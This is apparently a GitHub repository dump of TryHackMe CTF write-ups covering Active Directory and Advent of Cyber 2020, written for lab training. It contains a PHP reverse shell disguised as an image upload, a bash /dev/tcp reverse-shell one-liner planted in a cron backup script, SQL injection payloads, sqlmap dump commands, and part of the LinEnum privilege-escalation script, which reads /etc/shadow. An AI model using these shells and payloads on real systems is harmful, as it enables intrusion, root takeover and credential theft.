[ { "path": ".github/FUNDING.yml", "content": "github: edoardottt\nliberapay: edoardottt\npatreon: edoardottt\nko_fi: edoardottt\nopen_collective: edoardottt\ncustom: \"https://www.paypal.me/edoardottt\"\n" }, { "path": ".github/ISSUE_TEMPLATE/bug_report.md", "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n\n" }, { "path": ".github/auto_assign.yml", "content": "# Set to true to add reviewers to pull requests\naddReviewers: true\n\n# A list of reviewers to be added to pull requests (GitHub user name)\nreviewers: \n - edoardottt\n\n# A list of keywords to be skipped the process that add reviewers if pull requests include it \nskipKeywords:\n - wip\n\n# A number of reviewers added to the pull request\n# Set 0 to add all the reviewers (default: 0)\nnumberOfReviewers: 0\n" }, { "path": "Active-Directory-Basics/README.md", "content": "# Active Directory Basics\n\n- I understand what Active Directory is and why it is used.\n\n\t no answer needed\n\n- What database does the AD DS contain?\n\n\t- `NTDS.dit`\n\n- Where is the NTDS.dit stored?\n\n\t- `%SystemRoot%\\NTDS`\n\n- What type of machine can be a domain controller?\n\n\t- `Windows server`\n\n- What is the term for a hierarchy of domains in a network?\n\n\t- `tree`\n\n- What is the term for the rules for object creation?\n\n\t- `Domain schema`\n\n- What is the term for containers for groups, computers, users, printers, and other OUs?\n\n\t- `Organization units`\n\n- Which type of groups specify user permissions?\n\n\t- `Security groups`\n\n- Which group contains all workstations and servers joined to the domain?\n\n\t- `Domain computers`\n\n- Which group can publish certificates to the directory?\n\n\t- `Cert publisher`\n\n- Which user can make changes to a local machine but not to a domain controller?\n\n\t- `Local administrators`\n\n- Which group has their passwords replicated to read-only domain controllers?\n\n\t- `Allowed RODC Password Replication Group`\n\n- What type of trust flows from a trusting domain to a trusted domain?\n\n\t- `Directional`\n\n- What type of trusts expands to include other trusted domains?\n\n\t- `Transitive`\n\n- What type of authentication uses tickets?\n\n\t- `Kerberos`\n\n- What domain service can create, validate, and revoke public key certificates?\n\n\t- `Certificate Services`\n\n- What is the Azure AD equivalent of LDAP?\n\n\t- `Rest apis`\n\n- What is the Azure AD equivalent of Domains and Forests?\n\n\t- `Tenants`\n\n- What is the Windows Server AD equivalent of Guests?\n\n\t- `Trusts`\n\n- Deploy the machine\n\n\t no answer needed\n\n- What is the name of the Windows 10 operating system?\n \n\t- `Get-NetComputer -fulldata | select operatingsystem`\n\t- `*********** ** ********* **********`\n\n- What is the second \"Admin\" name?\n\n\t- `Get-NetUser | select cn`\n\t- `******`\n\n- Which group has a capital “V” in the group name?\n\n\t- `net localgroup`\n\t- `Hyper-V Administrators`\n\n- When was the password last set for the SQLService user?\n\n\t- `Get-ADUser -identity SQLService -properties *`\n\t- `5/**/2020 *:**:** PM`\n\n- I understand the basics of Active Directory\n\n\t no answer needed\n\n\n" }, { "path": "Advent-of-Cyber-2020/Day-01-A_Christmas_Crisis/README.md", "content": "# Day 1 - A Christmas Crisis\n\n- **Deploy your AttackBox (the blue \"Start AttackBox\" button)** and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP into the browser search bar.\n\n\t\tno answer needed\n\n- Register for an account, and then login.\nWhat is the name of the cookie used for authentication?\n\n\t- Go into a browser (I suggest you Chrome or Firefox) and fire up browser developers tools (F12). Go into the storage tab and select cookies on the left. `auth`.\n\n- In what format is the value of this cookie encoded?\n\n\t- `hexadecimal`\n\n- Having decoded the cookie, what format is the data stored in?\n\n\t- `json`\n\n- Figure out how to bypass the authentication.\nWhat is the value of Santa's cookie?\n\n\t- Decode your cookie value from hexadecimal to Text. I used [this](https://cryptii.com/pipes/hex-decoder). Then change your username to `santa`. You should have something like: `************************************************************************************************d65223a2253616e7461227d`\n\t- Now, if you change the previous cookie with this new one and refresh the page you will see some changes...\n\n- Now that you are the santa user, you can re-activate the assembly line!\nWhat is the flag you're given when the line is fully active?\n\n\t- `THM{********************************}`\n\n## see you...\n" }, { "path": "Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/README.md", "content": "# Day 2 - The Elf Strikes Back!\n\n- What string of text needs added to the URL to get access to the upload page?\n\n\t- `?id=YOUR-ID-HERE`\n\n- What type of file is accepted by the site?\n\n\t- Open the browser and check the page source code. You will find this string: ``\n\t- `image`\n\n- Bypass the filter and upload a reverse shell.\nIn which directory are the uploaded files stored?\n\n\t- Change the ip in the file reverse.jpeg.php with your ip (in the vpn...so tun0) and upload that file.\n\n\t- `/uploads/`\n\n- Activate your reverse shell and catch it in a netcat listener!\n\n\t- `nc -lvnp 1234`\n\n\t- Go to `http:///uploads/` and click on reverse.jpeg.php\n\n\t- You should see a shell.\n\n- What is the flag in /var/www/flag.txt?\n\n\t- `cat /var/www/flag.txt`\n\n\t- `THM{**********************************}`\n\n## see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/reverse.jpeg.php", "content": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\t// Check for end of TCP connection\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\t// Check for end of STDOUT\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t// Wait until a command is end down $sock, or some\n\t// command output is available on STDOUT or STDERR\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\t// If we can read from the TCP socket, send\n\t// data to process's STDIN\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\t// If we can read from the process's STDOUT\n\t// send data down tcp connection\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\t// If we can read from the process's STDERR\n\t// send data down tcp connection\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?> \n" }, { "path": "Advent-of-Cyber-2020/Day-03-Christmas_Chaos/README.md", "content": "# Day 3 - Christmas Chaos\n\n- Deploy your AttackBox (the blue \"Start AttackBox\" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP () into the browser search bar.\n\n\t no answer needed\n\n\tYou should see something this login page:\n\n\t![login](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-03-Christmas_Chaos/login.png)\n\n- Use BurpSuite to bruteforce the login form. Use the following lists for the default credentials:\n\n\t| Username | Password |\n\t|---|---|\n\t| root | root |\n\t| admin | password |\n\t| user | 12345 |\n\n\tUse the correct credentials to log in to the Santa Sleigh Tracker app. Don't forget to turn off Foxyproxy once BurpSuite has finished the attack.\n\n\t- First of all make sure you're under proxy. If not, follow the instructions above (on the CTF page) to enable it if you're using AttackBox. If not, add FoxyProxy to the extensions, then create a record with options: name: `Burp` or whatever you like; Proxy type: `HTTP`; Proxy IP: `127.0.0.1`; Port: `8080`. Then save and enable it.\n\n\t- Open BurpSuite and perform a login (with random user and pass) request with the Browser.\n\n\t- On the proxy tab of BurpSuite you should see a new request captured. Something like this:\n\t\t\n\t\t```POST /login HTTP/1.1\n\t\tHost: \n\t\tUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n\t\tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n\t\tAccept-Language: en-US,en;q=0.5\n\t\tAccept-Encoding: gzip, deflate\n\t\tContent-Type: application/x-www-form-urlencoded\n\t\tContent-Length: 31\n\t\tOrigin: http://\n\t\tConnection: close\n\t\tReferer: http:///\n\t\tUpgrade-Insecure-Requests: 1\n\n\t\tusername=&password=\n\t\t```\n\n\t- Right click on it and click `send to Intruder`.\n\n\t- Go to Intruder tab and then on position sub-tab.\n\n\t- Change the attack type from `Sniper` to `Cluster Bomb`.\n\t\n\t- Make sure the and the are selected with these symbols `username=§§&password=§§`. If not, highlight them with the cursor and click on `Add §`.\n\t\n\t- Then switch to Payloads sub-tab and set all the payloads. We have two payloads: username and password, respectively 1 and 2. So, for instance, to set the list of possible payloads for the username, the option `Payload set` will be set to `1` and the we add to the list of payloads our three (just an example, in real we can perform thousands of requests) items. Same for password.\n\n\t- Start the attack.\n\n\t- You can see one of the result rows has different length in respect to the others... Let's try with that login credentials!\n\n\t- Turn off proxy with FoxyProxy\n\t\n\t- It works!\n\n\t- `THM{********************************}`\n\n## see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-04-Santa's_watching/README.md", "content": "# Day 4 - Santa's watching\n\nOur malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of **YYYYMMDD**.\n\nRecommended list: [big.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt)\n\n- Deploy your AttackBox (the blue \"Start AttackBox\" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP (10.10.135.56) into the browser search bar.\n\n\t no answer needed\n\t\n\tIf you navigate with your browser to the you should see this page:\n\n\n\t![site](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-04-Santa's_watching/site.png)\n\t\n- Given the URL \"http://shibes.xyz/api.php\", what would the entire wfuzz command look like to query the \"breed\" parameter using the wordlist \"big.txt\" (assume that \"big.txt\" is in your current directory)\n**Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!**\n\n\t- `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ`\n\n- Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?\n\n\t- `gobuster dir -u -w big.txt`\n\t- You will find a directory and the a php file.\n\n- Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?\n\n\t- Execute the python file with `python3 create_list.py`. It will create a list for you with format `YYYYMMDD`.\n\t- `wfuzz -c -z file,YYYYMMDD-list.txt -d \"date=FUZZ\" --hw 0 http:///api/site-log.php`\n\t- Executing this command, it will try to fuzz the date parameter, and I've inserted the --hw parameter set to 0 because I tried few times and I saw the incorrect answers contains no words.\n\t- The only respone you get is from one word. Just append that word, let's say is YYYYMMDD. Go to browser and query `http:///api/site-log.php?date=YYYYMMDD`.\n\t- `THM{********}`\n\n# see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py", "content": "#!/usr/bin/python3\n'''\n@author edoardottt\n'''\nstarting_year = 2010\ncurrent_year = 2020\n\ndef pad_number(inp, length):\n if len(str(inp))==length: return str(inp)\n return (length - len(str(inp))) * \"0\" + str(inp)\n\nwith open(\"YYYYMMDD-list.txt\",\"w+\") as f:\n for y in range(starting_year,current_year + 1):\n for m in range(1, 13):\n for d in range(1,32):\n f.write(pad_number(y,4) + pad_number(m,2) + pad_number(d,2) + \"\\n\")\n\n" }, { "path": "Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/README.md", "content": "# Day 5 - Someone stole Santa's gift list!\n\n- Without using directory brute forcing, what's Santa's secret login panel?\n\n\t- You don't have to use a directory fuzzer because you will not find a list with this word.\n\t- `santapanel`\n\t\n\tYou will see this page:\n\t![santapanel](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/santapanel.png)\n\t\n- Visit Santa's secret login panel and bypass the login using SQLi\n\n\t no answer needed\n\t\n\t- Just enter in the username field `' OR true --`\n\n- How many entries are there in the gift database?\n\n\t- `(' OR true --`\n\t- `22`\n\n- What did Paul ask for?\n\n\t- `github ownership`\n\n- What is the flag?\n\n\t- You have to enable the Burp option with FoxyProxy.\n\t- Then, open BurpSuie and perform a single request with the text field.\n\t- You will see BurpSuite opened with a http request. Send to repeater and save the item as shown in the explaining part previous the ctf.\n\t- Then start sqlmap with `sqlmap -r request.txt --tamper=space2comment --dump-all --dbms sqlite` taking request.txt as the saved file with BurpSuite.\n\t- (If sqlmap will ask you something, you have to try the largest attack you can, so try to perform all the tries you can; choosing y or n when it asks you).\n\t- `thmfox{***_*_****_***_*********_**_***}`\n\n- What is the admin password?\n\n\t- `****************`\n\n# see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/README.md", "content": "# Day 6 - Be careful with what you wish on a Christmas night\n\n- Deploy your AttackBox (the blue \"Start AttackBox\" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machines IP (http://:5000) into the browser search bar (the webserver is running on port 5000, so make sure this is included in your web requests).\n\n\t no answer needed\n\t\n\t![santasportal](https://github.com/edoardottt/tryhackme-ctf/blob/main/Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/santasportal.png)\n\n- What vulnerability type was used to exploit the application?\n\n\t- `stored crosssite scripting`\n\n- What query string can be abused to craft a reflected XSS?\n\n\t- If you query one example on the first search bar, you will see there's a new char appended to URL.\n\t- `q`\n\n- Launch the OWASP ZAP Application\n\n\t no answer needed\n\n- Run a ZAP (zaproxy) automated scan on the target. How many alerts does it display?\n\n\t- `5`\n\n- How many types of XSS are there in the scan?\n\n\t- `2`\n\n- Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the \"Make a wish\" website?\n\n\t no answer needed\n\n## see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/%2f", "content": "\n\n \n \nTBFC's Internal Blog\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n \n \n\n\n\n
\n \n\n
\n
\n
\n \n

\n TBFC's Internal Blog\n

\n \n \n
\n
\n
\n
\n \n\n \n
\n
\n \n \n \n\n \n \n\n \n \n\n \n
\n \n

Recruitment Drive

\n \n
\n \n

Hey fellow Elves! We’re currently recruiting for the positions listed below. As always, please sned your reccomendations to your workshop manager - any successful referer will receieve a $150 bonus in their next pay packet.\n1x HR Manager: We are seeking a new Elf McKaren. All applications must have 3 years prior experience in a similar role and be able to work under crunch time.\n4x Stocking Fillers Our dispatch team is looking for new fresh-faces to bolster the ranks of fellow stocking fillers.

\n Read More\n \n
\n\n
\n \n  Nov 25, 2020\n \n\n\n
\n
\n\n \n
\n \n
\n\n \n\n \n\n" }, { "path": "Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/README.md", "content": "# The Grinch Really Did Steal Christmas\n\nDownload the ZIP file \"aocpcaps.zip\" that is attached to this task, use a combination of the filters and features of Wireshark we've covered to answer the questions below:\n\n- Open \"pcap1.pcap\" in Wireshark. What is the IP address that initiates an ICMP/ping?\n\n\t- `10.11.3.2`\n\n- If we only wanted to see HTTP GET requests in our \"pcap1.pcap\" file, what filter would we use?\n\n\t- `http.request.method == get`\n\n- Now apply this filter to \"pcap1.pcap\" in Wireshark, what is the name of the article that the IP address \"10.10.67.199\" visited?\n\n\t- `reindeer-of-the-week`\n\n- Let's begin analysing \"pcap2.pcap\". Look at the captured FTP traffic; what password was leaked during the login process?\nThere's a lot of irrelevant data here - Using a filter here would be useful!\n\n\t- `*********_********_******`\n\n- Continuing with our analysis of \"pcap2.pcap\", what is the name of the protocol that is encrypted?\n\n\t- `ssh`\n\n- Analyse \"pcap3.pcap\" and recover Christmas!\nWhat is on Elf McSkidy's wishlist that will be used to replace Elf McEager?\n\n\t- `Rubber ducky`\n\n## see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/elf_mcskidy_wishlist.txt", "content": "Wish list for Elf McSkidy\r\n-------------------------\r\nBudget: £100\r\n\r\nx3 Hak 5 Pineapples\r\nx1 Rubber ducky (to replace Elf McEager)\r\n" }, { "path": "Advent-of-Cyber-2020/Day-08-What's_Under_the_Christmas_Tree?/README.md", "content": "# What's unders the Christmas Tree?\n\n\n- When was Snort created?\n\n\t- A Google search is enough (as always...).\n\t- `1998`\n\n- Using Nmap on , what are the port numbers of the three services running? (Please provide your answer in ascending order/lowest -> highest, separated by a comma)\n\n\t- `nmap `\n\t- `80,2222,3389`\n\n- Run a scan and provide the -Pn flag to ignore ICMP being used to determine if the host is up\n\n\t no answer needed\n\t\n\t- `nmap -Pn `\n\n- Experiment with different scan settings such as -A and -sV whilst comparing the outputs given.\n\n\t no answer needed\n\n\t- `nmap -A `\n\t- `nmap -sV `\n\n- Use Nmap to determine the name of the Linux distribution that is running, what is reported as the most likely distribution to be running?\n\n\t- `nmap -Pn -sV `\n\t- `Ubuntu`\n\n- Use Nmap's Network Scripting Engine (NSE) to retrieve the \"HTTP-TITLE\" of the webserver. Based on the value returned, what do we think this website might be used for?\n\n\t- `nmap --script=http-title `\n\t- `blog`\n\n- Now use different scripts against the remaining services to discover any further information about them\n\n\t no answer needed\n\n\t- `nmap --script=vuln `\n\t- `nmap --script=ssh-auth-methods -p 2222 `\n\n\n\n" }, { "path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/README.md", "content": "# Anyone can be Santa!\n\nBefore we begin, we're going to need to deploy two Instances:\n\n\t1. The THM AttackBox by pressing the \"Start AttackBox\" button at the top-right of the page.\n\t2. The vulnerable Instance attached to this task by pressing the \"Deploy\" button at the top-right of this task/day.\n\n- Name the directory on the FTP server that has data accessible by the \"anonymous\" user\n\n\t- `ftp ` and enter `anonymous` \n\t- `public`\n\n- What script gets executed within this directory?\n\n\t- `backup.sh`\n\n- What movie did Santa have on his Christmas shopping list?\n\n\t- (ftp) `get shoppinglist.txt`\n\t- `The polar express`\n\n- Re-upload this script to contain malicious data (just like we did in section 9.6. Output the contents of /root/flag.txt!\nNote that the script that we have uploaded may take a minute to return a connection. If it doesn't after a couple of minutes, double-check that you have setup a Netcat listener on the device that you are working from, and have provided the TryHackMe IP of the device that you are connecting from.\n\n\t- Insert your IP address in `backup.sh` where is the lable.\n\t- (ftp) `put backup.sh`\n\t- On your machine `nc -lvnp 4444`\n\t- You should get a root shell in a minute.\n\t- `cat /root/flag.txt`\n\t- `THM{****_***_***_**_*****}`\n\n\n\n\n\n" }, { "path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/backup.sh", "content": "bash -i >& /dev/tcp/10.9.126.198/4444 0>&1\n" }, { "path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/old_backup.sh", "content": "#!/bin/bash\n\n# Created by ElfMcEager to backup all of Santa's goodies!\n\n# Create backups to include date DD/MM/YYYY\nfilename=\"backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz\";\n\n# Backup FTP folder and store in elfmceager's home directory\ntar -zcvf /home/elfmceager/$filename /opt/ftp\n\n# TO-DO: Automate transfer of backups to backup server\n\n\n" }, { "path": "Advent-of-Cyber-2020/Day-09-Anyone_can_be_Santa!/shoppinglist.txt", "content": "The Polar Express Movie\n" }, { "path": "Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/README.md", "content": "# Don't be sElfish!\n\nBefore we begin, we're going to need to deploy two Instances:\n\n\t1. The THM AttackBox by pressing the \" Start AttackBox\" button at the top-right of the page.\n\t2. The vulnerable Instance attached to this task by pressing the \"Deploy\" button at the top-right of this task/day.\n\n- Using enum4linux, how many users are there on the Samba server?\n\n\t- `enum4linux -a `\n\t- `3`\n\n- Now how many \"shares\" are there on the Samba server?\n\n\t- `4`\n\n- Use smbclient to try to login to the shares on the Samba server (10.10.151.244). What share doesn't require a password?\n\n\t- `smbclient ///`\n\t- `tbfc-santa`\n\n- Log in to this share, what directory did ElfMcSkidy leave for Santa?\n\n\t- `jingle-tunes`\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/note_from_mcskidy.txt", "content": "Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy\n" }, { "path": "Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/LinEnum.sh", "content": "#!/bin/bash\n#A script to enumerate local information from a Linux host\nversion=\"version 0.982\"\n#@rebootuser\n\n#help function\nusage () \n{ \necho -e \"\\n\\e[00;31m#########################################################\\e[00m\" \necho -e \"\\e[00;31m#\\e[00m\" \"\\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\\e[00m\" \"\\e[00;31m#\\e[00m\"\necho -e \"\\e[00;31m#########################################################\\e[00m\"\necho -e \"\\e[00;33m# www.rebootuser.com | @rebootuser \\e[00m\"\necho -e \"\\e[00;33m# $version\\e[00m\\n\"\necho -e \"\\e[00;33m# Example: ./LinEnum.sh -k keyword -r report -e /tmp/ -t \\e[00m\\n\"\n\n\t\techo \"OPTIONS:\"\n\t\techo \"-k\tEnter keyword\"\n\t\techo \"-e\tEnter export location\"\n\t\techo \"-s \tSupply user password for sudo checks (INSECURE)\"\n\t\techo \"-t\tInclude thorough (lengthy) tests\"\n\t\techo \"-r\tEnter report name\" \n\t\techo \"-h\tDisplays this help text\"\n\t\techo -e \"\\n\"\n\t\techo \"Running with no options = limited scans/no output file\"\n\t\t\necho -e \"\\e[00;31m#########################################################\\e[00m\"\t\t\n}\nheader()\n{\necho -e \"\\n\\e[00;31m#########################################################\\e[00m\" \necho -e \"\\e[00;31m#\\e[00m\" \"\\e[00;33mLocal Linux Enumeration & Privilege Escalation Script\\e[00m\" \"\\e[00;31m#\\e[00m\" \necho -e \"\\e[00;31m#########################################################\\e[00m\" \necho -e \"\\e[00;33m# www.rebootuser.com\\e[00m\" \necho -e \"\\e[00;33m# $version\\e[00m\\n\" \n\n}\n\ndebug_info()\n{\necho \"[-] Debug Info\" \n\nif [ \"$keyword\" ]; then \n\techo \"[+] Searching for the keyword $keyword in conf, php, ini and log files\" \nfi\n\nif [ \"$report\" ]; then \n\techo \"[+] Report name = $report\" \nfi\n\nif [ \"$export\" ]; then \n\techo \"[+] Export location = $export\" \nfi\n\nif [ \"$thorough\" ]; then \n\techo \"[+] Thorough tests = Enabled\" \nelse \n\techo -e \"\\e[00;33m[+] Thorough tests = Disabled\\e[00m\" \nfi\n\nsleep 2\n\nif [ \"$export\" ]; then\n mkdir $export 2>/dev/null\n format=$export/LinEnum-export-`date +\"%d-%m-%y\"`\n mkdir $format 2>/dev/null\nfi\n\nif [ \"$sudopass\" ]; then \n echo -e \"\\e[00;35m[+] Please enter password - INSECURE - really only for CTF use!\\e[00m\"\n read -s userpassword\n echo \nfi\n\nwho=`whoami` 2>/dev/null \necho -e \"\\n\" \n\necho -e \"\\e[00;33mScan started at:\"; date \necho -e \"\\e[00m\\n\" \n}\n\n# useful binaries (thanks to https://gtfobins.github.io/)\nbinarylist='aria2c\\|arp\\|ash\\|awk\\|base64\\|bash\\|busybox\\|cat\\|chmod\\|chown\\|cp\\|csh\\|curl\\|cut\\|dash\\|date\\|dd\\|diff\\|dmsetup\\|docker\\|ed\\|emacs\\|env\\|expand\\|expect\\|file\\|find\\|flock\\|fmt\\|fold\\|ftp\\|gawk\\|gdb\\|gimp\\|git\\|grep\\|head\\|ht\\|iftop\\|ionice\\|ip$\\|irb\\|jjs\\|jq\\|jrunscript\\|ksh\\|ld.so\\|ldconfig\\|less\\|logsave\\|lua\\|make\\|man\\|mawk\\|more\\|mv\\|mysql\\|nano\\|nawk\\|nc\\|netcat\\|nice\\|nl\\|nmap\\|node\\|od\\|openssl\\|perl\\|pg\\|php\\|pic\\|pico\\|python\\|readelf\\|rlwrap\\|rpm\\|rpmquery\\|rsync\\|ruby\\|run-parts\\|rvim\\|scp\\|script\\|sed\\|setarch\\|sftp\\|sh\\|shuf\\|socat\\|sort\\|sqlite3\\|ssh$\\|start-stop-daemon\\|stdbuf\\|strace\\|systemctl\\|tail\\|tar\\|taskset\\|tclsh\\|tee\\|telnet\\|tftp\\|time\\|timeout\\|ul\\|unexpand\\|uniq\\|unshare\\|vi\\|vim\\|watch\\|wget\\|wish\\|xargs\\|xxd\\|zip\\|zsh'\n\nsystem_info()\n{\necho -e \"\\e[00;33m### SYSTEM ##############################################\\e[00m\" \n\n#basic kernel info\nunameinfo=`uname -a 2>/dev/null`\nif [ \"$unameinfo\" ]; then\n echo -e \"\\e[00;31m[-] Kernel information:\\e[00m\\n$unameinfo\" \n echo -e \"\\n\" \nfi\n\nprocver=`cat /proc/version 2>/dev/null`\nif [ \"$procver\" ]; then\n echo -e \"\\e[00;31m[-] Kernel information (continued):\\e[00m\\n$procver\" \n echo -e \"\\n\" \nfi\n\n#search all *-release files for version info\nrelease=`cat /etc/*-release 2>/dev/null`\nif [ \"$release\" ]; then\n echo -e \"\\e[00;31m[-] Specific release information:\\e[00m\\n$release\" \n echo -e \"\\n\" \nfi\n\n#target hostname info\nhostnamed=`hostname 2>/dev/null`\nif [ \"$hostnamed\" ]; then\n echo -e \"\\e[00;31m[-] Hostname:\\e[00m\\n$hostnamed\" \n echo -e \"\\n\" \nfi\n}\n\nuser_info()\n{\necho -e \"\\e[00;33m### USER/GROUP ##########################################\\e[00m\" \n\n#current user details\ncurrusr=`id 2>/dev/null`\nif [ \"$currusr\" ]; then\n echo -e \"\\e[00;31m[-] Current user/group info:\\e[00m\\n$currusr\" \n echo -e \"\\n\"\nfi\n\n#last logged on user information\nlastlogedonusrs=`lastlog 2>/dev/null |grep -v \"Never\" 2>/dev/null`\nif [ \"$lastlogedonusrs\" ]; then\n echo -e \"\\e[00;31m[-] Users that have previously logged onto the system:\\e[00m\\n$lastlogedonusrs\" \n echo -e \"\\n\" \nfi\n\n#who else is logged on\nloggedonusrs=`w 2>/dev/null`\nif [ \"$loggedonusrs\" ]; then\n echo -e \"\\e[00;31m[-] Who else is logged on:\\e[00m\\n$loggedonusrs\" \n echo -e \"\\n\"\nfi\n\n#lists all id's and respective group(s)\ngrpinfo=`for i in $(cut -d\":\" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null`\nif [ \"$grpinfo\" ]; then\n echo -e \"\\e[00;31m[-] Group memberships:\\e[00m\\n$grpinfo\"\n echo -e \"\\n\"\nfi\n\n#added by phackt - look for adm group (thanks patrick)\nadm_users=$(echo -e \"$grpinfo\" | grep \"(adm)\")\nif [[ ! -z $adm_users ]];\n then\n echo -e \"\\e[00;31m[-] It looks like we have some admin users:\\e[00m\\n$adm_users\"\n echo -e \"\\n\"\nfi\n\n#checks to see if any hashes are stored in /etc/passwd (depreciated *nix storage method)\nhashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null`\nif [ \"$hashesinpasswd\" ]; then\n echo -e \"\\e[00;33m[+] It looks like we have password hashes in /etc/passwd!\\e[00m\\n$hashesinpasswd\" \n echo -e \"\\n\"\nfi\n\n#contents of /etc/passwd\nreadpasswd=`cat /etc/passwd 2>/dev/null`\nif [ \"$readpasswd\" ]; then\n echo -e \"\\e[00;31m[-] Contents of /etc/passwd:\\e[00m\\n$readpasswd\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$readpasswd\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/passwd $format/etc-export/passwd 2>/dev/null\nfi\n\n#checks to see if the shadow file can be read\nreadshadow=`cat /etc/shadow 2>/dev/null`\nif [ \"$readshadow\" ]; then\n echo -e \"\\e[00;33m[+] We can read the shadow file!\\e[00m\\n$readshadow\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$readshadow\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/shadow $format/etc-export/shadow 2>/dev/null\nfi\n\n#checks to see if /etc/master.passwd can be read - BSD 'shadow' variant\nreadmasterpasswd=`cat /etc/master.passwd 2>/dev/null`\nif [ \"$readmasterpasswd\" ]; then\n echo -e \"\\e[00;33m[+] We can read the master.passwd file!\\e[00m\\n$readmasterpasswd\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$readmasterpasswd\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null\nfi\n\n#all root accounts (uid 0)\nsuperman=`grep -v -E \"^#\" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null`\nif [ \"$superman\" ]; then\n echo -e \"\\e[00;31m[-] Super user 